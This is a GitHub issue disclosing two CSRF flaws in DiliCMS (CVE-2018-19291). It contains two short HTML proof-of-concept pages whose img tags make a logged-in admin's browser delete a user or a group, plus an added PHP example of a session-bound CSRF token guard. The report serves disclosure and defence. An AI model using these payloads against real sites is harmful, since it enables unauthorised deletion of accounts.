chekun / DiliCMS

DiligentCMS
http://www.dilicms.com/
MIT License
190 stars 101 forks

There are two CSRF vulnerabilities that can delete a user or usergroup #60

Open Rich4ever opened 6 years ago

Rich4ever commented 6 years ago

Software Link: https://github.com/chekun/DiliCMS

After the administrator has logged in, open the page test.html. Delete user POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
  </body>
</html>

test2.html delete group POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
  </body>
</html>
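Both POCs work because the delete routes act on a plain GET request carrying only the admin's session cookie, so any page the admin visits can trigger them. The following is an added example (not DiliCMS code and not from the reporter) of the server-side guard that closes this class of bug: a per-session token that every state-changing admin form must send back over POST and that the handler checks in constant time. The function names `csrf_token`, `csrf_check` and `csrf_field` are assumptions for the illustration.

```php
<?php
// Added example, not DiliCMS code: minimal CSRF guard for state-changing
// admin routes such as user/del and role/del. Helper names are assumed.

// Issue one random token per session and keep it server-side.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Validate a state-changing request: it must be a POST and must carry the
// token that belongs to this session, compared in constant time.
function csrf_check(array $session, string $method, array $post): bool {
    if ($method !== 'POST') {
        return false;   // a GET triggered by <img src="..."> never passes
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Hidden field to embed in every admin form that performs a deletion.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Example handler for a delete route: reject the request before touching
// the database unless the guard passes.
function handle_user_delete(array $session, string $method, array $post, int $id): string {
    if (!csrf_check($session, $method, $post)) {
        return "403: refused to delete user $id (missing or invalid CSRF token)";
    }
    // real code would delete the record here
    return "deleted user $id";
}

// --- constructed demo: replays the situations from the report ---
$session = [];                       // stands in for $_SESSION
$token   = csrf_token($session);

// 1. cross-site <img> request: GET, no token
echo handle_user_delete($session, 'GET', [], 1), PHP_EOL;
// 2. forged POST that does not know the session token
echo handle_user_delete($session, 'POST', ['csrf_token' => 'guess'], 1), PHP_EOL;
// 3. legitimate submission of a form that included csrf_field($session)
echo handle_user_delete($session, 'POST', ['csrf_token' => $token], 1), PHP_EOL;
```

The same check applies unchanged to the role/del route. Binding the token to the session rather than to a cookie alone is what defeats the <img>-based POCs above: the browser will still attach the admin's cookie to a cross-site request, but it cannot read or forge the token the form must submit.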
fgeek commented 5 years ago

Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.